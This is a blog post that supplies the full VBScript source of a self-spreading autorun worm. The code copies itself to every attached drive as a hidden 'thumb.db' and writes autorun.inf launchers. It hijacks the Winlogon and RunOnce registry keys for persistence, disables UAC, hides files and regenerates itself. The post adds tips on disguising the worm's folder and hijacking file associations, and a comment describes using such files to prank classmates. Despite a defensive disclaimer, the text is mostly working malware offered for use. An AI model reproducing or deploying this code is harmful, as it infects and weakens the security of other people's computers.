How to make Autorun Virus in VBScript

THIS IS A BASIC FRAMEWORK OF A VBS AUTORUN VIRUS. THIS IS FOR THOSE WHO WANT TO KNOW HOW AUTORUN VIRUSES ACTUALLY WORK SO THAT THEY CAN DEFEND THEMSELVES AGAINST SUCH THREATS
THIS IS A BASIC FRAMEWORK OF VBS AUTORUN WORM DETECTED AS GENERIC.SCRIPTWORM, WORM/VBS, VBS.SASAN.A, VBS.SOLOW AND VBS:AGENT-JF[WRM]. THE VIRUS NORMALLY WORKS UNDER PRE-WINDOWS 7 RELEASES (UPTO WIN-VISTA) BECAUSE AUTORUN.INF DOESN'T WORK IN WINDOWS 7 IN USB DRIVES. BUT, IF MANUALLY RUN (FROM WSCRIPT) THEN IT CAN INFECT WINDOWS 7 TOO. IF THE READER WANTS TO TEST IT, S/HE MAY DO SO ONLY UNDER SAFE ENVIRONMENT (UNDER VIRTUALBOX OR VIRTUAL PC) ISOLATED FROM THE HOST ENVIRONMENT TO PREVENT SELF-INFECTION


Option Explicit
Const script_eng = "wscript.exe -e:VBScript "
Dim i
Dim fso, Shell, tfile
Dim HIVES
Dim Tempdir, Systemdir
Dim myfolder, myfile, mypath, mycode, auto_inf
Dim userinit, device

On Error Resume Next

Set Shell = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.Filesystemobject")
                                Set myfile = fso.GetFile(WScript.ScriptFullName)
                                mycode = myfile.OpenAsTextStream(1, - 2).ReadAll
                                Set myfolder = myfile.ParentFolder
                                If (Right(myfolder, 1) <> "\") Then _
                                                   myfolder = myfolder & "\"
                                mypath = myfolder & myfile.Name
                                If (myfile.ParentFolder = myfile.Drive.Path & "\RECYCLER") Then _
                                             Shell.Run("explorer.exe " & myfile.Drive.Path & "\")
                                Set myfile = Nothing
                                HIVES = Array("HKEY_CURRENT_USER\", "HKEY_LOCAL_MACHINE\")
                                Set Systemdir = fso.GetSpecialFolder(1)              
                                Set Tempdir = fso.getspecialfolder(2)
                                userinit = Systemdir & "\userinit.exe," & Systemdir & "\" _
                                                                  & script_eng & Systemdir & "\thumb.db"
                                                                 
auto_inf = "[AUT" & "ORUN]" & vbCrLf
auto_inf = auto_inf & "ShellEx" & "ecute=" & script_eng & "RECYCLER\thumb.db"
auto_inf = auto_inf & vbcrlf & "Action=Ope" & "n folder t" & "o view files" & vbCrLf
auto_inf = auto_inf & "Shell\Forma" & "t...\Comma" & "nd=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "Shell\" & "Open\" & "Comman" & "d=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "Shell\Expl" & "ore\Comma" & "nd=" & script_eng _
                                & "RECYCLER\thumb.db" & vbCrLf
auto_inf = auto_inf & "ico" & "n=shell32.dll,4"
copy_in_system()
 Do
         regcreate()        
         infect_devices()
         self_regen()
                               
         If ((myfolder = Systemdir & "\") Or (myfolder = Tempdir & "\")) Then _
                                 WScript.Sleep(1000)
Loop While ((myfolder = Systemdir & "\") Or (myfolder = TempDir & "\"))
Virus residing in the System Folder


Function regcreate()
For i = 0 To 1
  Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit", userinit, "REG_SZ"
  Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\AudioSvc", script_eng & Tempdir & "\thumb.db", "REG_SZ"
   Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA", 0, "REG_DWORD"
   Shell.RegWrite HIVES(i) & "SOFTWARE\Microsoft\Windows\CurrentVersion\" _
     & "Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue", 0, "REG_DWORD"
Next
End Function
The Registry-Key modified by the Worm
Function infect_devices()
For Each device In fso.Drives
      If ((device.DriveLetter <> "A") And (device.DriveLetter <> "B")) Then
            If ((device.DriveType = 1) Or (device.DriveType = 3)) Then
                If (device.IsReady) then
                     If (fso.FolderExists(device.Path & "\Autorun.inf")) Then _
                            fso.DeleteFolder(device.Path & "\Autorun.inf"), True
                     If (Not fso.FolderExists(device.Path & "\RECYCLER")) Then _
                            fso.CreateFolder(device.Path & "\RECYCLER").Attributes = 39
                            fso.GetFolder(device.Path & "\RECYCLER").Attributes = 39
                     If (Not fso.FileExists(device.Path & "\RECYCLER\thumb.db")) Then
                            write_file device.Path & "\RECYCLER\thumb.db", mycode                      
                     Else
                         If (fso.OpenTextFile(device.Path & "\RECYCLER\thumb.db", 1).ReadAll _
                                        <> mycode) Then
                             fso.DeleteFile(device.Path & "\RECYCLER\thumb.db"), True
                             write_file device.Path & "\RECYCLER\thumb.db", mycode
                         End If
                    End If
                If (Not fso.FileExists(device.Path & "\Autorun.inf")) Then
                    write_file device.Path & "\Autorun.inf", auto_inf
                Else
                      If (fso.OpenTextFile(device.Path & "\Autorun.inf", 1).readAll <> auto_inf) Then
                         fso.DeleteFile(device.Path & "\Autorun.inf"), True
                         write_file device.Path & "\Autorun.inf", auto_inf
                      End If
                End If
            End If
         End If
      End If
Next
End function

Function write_file(fpath, fcode)
Set tfile = fso.CreateTextFile(fpath)
tfile.Write(fcode)
tfile.Close
fso.GetFile(fpath).Attributes= 39                                                                                                                            
End Function

Function self_regen()
                If (Not fso.FileExists(mypath)) Then
                         write_file mypath, mycode
                Else
                         If (fso.OpenTextFile(mypath, 1).readAll <> mycode) Then
                                     fso.DeleteFile(mypath), True
                                     write_file mypath, mycode
                         End If
                End If
End Function

Function copy_in_system()
                If (Not fso.FileExists(Systemdir & "\thumb.db")) Then
                              write_file Systemdir & "\thumb.db", mycode
                              Shell.Run(Systemdir & "\" & script_eng & Systemdir & "\thumb.db")
                Else
                               If (fso.OpenTextFile(Systemdir & "\thumb.db", 1).readAll <> mycode) Then
                                      fso.DeleteFile(Systemdir & "\thumb.db"), True
                                      write_file Systemdir & "\thumb.db", mycode
                                      Shell.Run(Systemdir & "\" & script_eng & Systemdir & "\thumb.db")
                               End If
                End If
                If (Not fso.FileExists(Tempdir & "\thumb.db")) Then
                                write_file Tempdir & "\thumb.db", mycode
                                Shell.Run(Systemdir & "\" & script_eng & Tempdir & "\thumb.db")
                Else
                                If (fso.OpenTextFile(Tempdir & "\thumb.db", 1).readAll <> mycode) Then
                                               fso.DeleteFile(Tempdir & "\thumb.db"), True
                                               write_file Tempdir & "\thumb.db", mycode
                                               Shell.Run(Systemdir & "\" & script_eng & Tempdir & "\thumb.db")
                                End If
                End If   
End function

The Snapshot above catches the scenario when the Virus is detected by Avast AntiVirus.
And here is what the infected device will have –An Autorun.inf file, and a companion file in the \RECYCLER\ folder, the autorun.inf is the file that actually starts the worm when interacted by user.
The Process WSCRIPT.EXE running which hosts the Viral Script.
Want to know what exactly happens when the Code runs ?
Well then have a look at this Flow Chart and learn the logic and the flow of control of the VBS Autorun Virus:
VBS Autorun Virus - FlowChart
Changing the Folder Icon:

RECYCLER folder icon

So, the folder 'RECYCLER' in which the worm resides shouldnot have a normal folder icon. Since it's name is 'RECYCLER', it's icon should resemble a RECYCLE BIN icon. To change the folder icon, we have to create a file called 'desktop.ini' inside the folder  and it needs to have the following code:
[.ShellClassInfo]
IconResource=%windir%\system32\Shell32.dll,32
The IconResource refers to the icon with index no.32 from inside the Shell32 DLL. As you can see in the picture below, thumb.db(the worm itself) is accompanied by a desktop.ini file inside the RECYCLER folder. Assuming that you can read & write VBScripts and provided that we have already shown how you can create the worm itself, it should not be a difficult job for you to add a few more lines of VBS code to create the desktop.ini file.

desktop.ini in RECYCLER folder

Instead of updating the Code of the worm in this post itself, we have included link for downloading a sample of thumb.db worm. You can download the sample from here.


The ability of the Worm can be expanded to running of Virus when opening the Inf file from Edit or clicking [RIGHT_CLICK] + DELETE. This is achieved by Altering the default registry Value of the associated File Extension in Registry in HKEY_CLASSES_ROOT. Under HKCR, '{EXTENSION + 'file'}\Shell\open\Command\' to your VIRUS-FULL-PATH with all the parameters needed. For eg. Here I will show what is needed to make the Virus get executed when you [RIGHT_CLICK] + EDIT : HKEY_CLASSES_ROOT\vbsfile\Shell\Edit\Command\, PATH-TO-VIRUS, REG_EXPAND_SZ.
Now, after you alter the registry under HKEY_CLASSES_ROOT, the default behaviour of the File Extension Explorer Menu will change.

Found this post useful ? If so, please Click +1 and RECOMMEND THIS SITE on Google

5 comments:

  1. so would this cause any actual harm to mine or a friends computer? We are pranking classmates with vbs files, and I do not want to get into any actual trouble

    ReplyDelete
    Replies
    1. Upto Windows Vista, it'll start spreading. It won't spread in Windows 7. It won't delete any files/modify them though.

      But, it can be troublesome to remove it once it installs itself in System without proper knowledge.

      Delete
  2. these vbs viruses are being blocked by my eset antivirus. they are real do not underestimate them lol

    ReplyDelete
  3. dont underestimate these .vbs viruses

    ReplyDelete
  4. i made a replica of this in lua

    ReplyDelete